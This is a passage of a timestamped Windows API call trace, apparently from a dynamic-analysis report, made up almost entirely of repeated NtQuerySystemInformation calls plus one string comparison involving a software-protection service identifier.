ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8f0, Length=0x20, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6f0, Length=0x28, ResultLength=0x0) [0294.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6d0, Length=0x20, ResultLength=0x0) [0294.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0294.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0294.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0294.304] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0294.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 